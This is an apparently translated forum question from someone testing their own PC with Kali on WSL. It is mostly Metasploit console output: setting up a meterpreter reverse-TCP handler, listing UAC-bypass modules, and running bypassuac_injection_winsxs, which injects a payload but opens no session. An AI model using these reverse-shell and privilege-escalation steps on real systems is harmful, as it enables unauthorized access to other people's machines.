漏洞利用已完成但未创建会话

漏洞利用已完成但未创建会话

我尝试使用 WSL 和 Kali 在我的 PC 上进行渗透测试,一切正常,直到在我的目标 PC 上创建并执行了有效负载,并恢复了会话。

  • 完成第一步后,我得到:
    msf6 > use multi/handler
      [*] Using configured payload generic/shell_reverse_tcp
    
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
    
    msf6 exploit(multi/handler) > set lhost 10.9.88.222
      lhost => 10.9.88.222
    
    msf6 exploit(multi/handler) > set lport 8080
      lport => 8080
    
    msf6 exploit(multi/handler) > start
      [-] Unknown command: start.
    
    msf6 exploit(multi/handler) > exploit
      [*] Started reverse TCP handler on 10.9.88.222:8080
      [*] Sending stage (175174 bytes) to 10.9.0.1
      [*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530
    
    meterpreter >
    

  • 然而,主要问题出现在这里;我试图绕过 UAC 并获得系统级权限,尝试了 4 - 6 个模块,通过执行后的搜索结果获得 search uac,执行后search uac,我得到:
    meterpreter > background
      [*] Backgrounding session 1...
    
    msf6 exploit(multi/handler) > search uac
    
    Matching Modules
    ================
    
      #   Name                                                   Disclosure Date  Rank       Check  Description
      -   ----                                                   ---------------  ----       -----  -----------
      0   exploit/windows/local/ask                              2012-01-03       excellent  No     Windows Escalate UAC Execute RunAs
      1   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
      2   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
      3   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
      4   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
      5   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
      6   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
      7   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
      8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
      9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
      10  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
      11  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
      12  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
      13  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
      14  post/windows/gather/win_privs                                           normal     No     Windows Gather Privileges Enumeration
      15  post/windows/manage/sticky_keys                                         normal     No     Sticky Keys Persistance Module
    
    
    Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys
    

    我尝试了模块 7,收到:
    msf6 exploit(multi/handler) > use 7
      [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets
      Exploit targets:
    
        Id  Name
        --  ----
        0   Windows x86
        1   Windows x64
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1
      target => 1
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp
      payload => windows/x64/meterpreter/reverse_tcp
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1
      session => 1
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222
      LHOST => 10.9.88.222
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080
      LPORT => 8080
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > run
      [*] Started reverse TCP handler on 10.9.88.222:8080
      [+] Windows 10 (10.0 Build 18363). may be vulnerable.
      [*] UAC is Enabled, checking level...
      [+] Part of Administrators group! Continuing...
      [+] UAC is set to Default
      [+] BypassUAC can bypass this setting, continuing...
      [*] Creating temporary folders...
      [*] Uploading the Payload DLL to the filesystem...
      [*] Spawning process with Windows Publisher Certificate, to inject into...
      [+] Successfully injected payload in to process: 9248
      [*] Exploit completed, but no session was created.
    
    msf6 exploit(windows/local/bypassuac_injection_winsxs) >
    
    • 一切顺利,但会话未创建,收到:
      exploit completed but no session was created
      
    • 我在详细模式下运行时得到此信息
      [*] Started reverse TCP handler on 10.9.88.222:8080
      [+] Windows 10 (10.0 Build 18363). may be vulnerable.
      [*] UAC is Enabled, checking level...
      [*] Checking admin status...
      [+] Part of Administrators group! Continuing...
      [+] UAC is set to Default
      [+] BypassUAC can bypass this setting, continuing...
      [*] Creating temporary folders...
      [*] Uploading the Payload DLL to the filesystem...
      [*] Payload DLL 8704 bytes long being uploaded...
      [*] Spawning process with Windows Publisher Certificate, to inject into...
      [*] Injecting  into process ID 10880
      [*] Opening process 10880
      [*] Injecting struct into 10880
      [*] Executing payload
      [+] Successfully injected payload in to process: 10880
      [*] Exploit completed, but no session was created.
      
    • 我曾经使用过Portmap.io端口转发(免费计划),并安装了最新版本的 Metasploit 框架、WSL 2 和 Kali Linux 应用程序


我该如何解决这个问题?

相关内容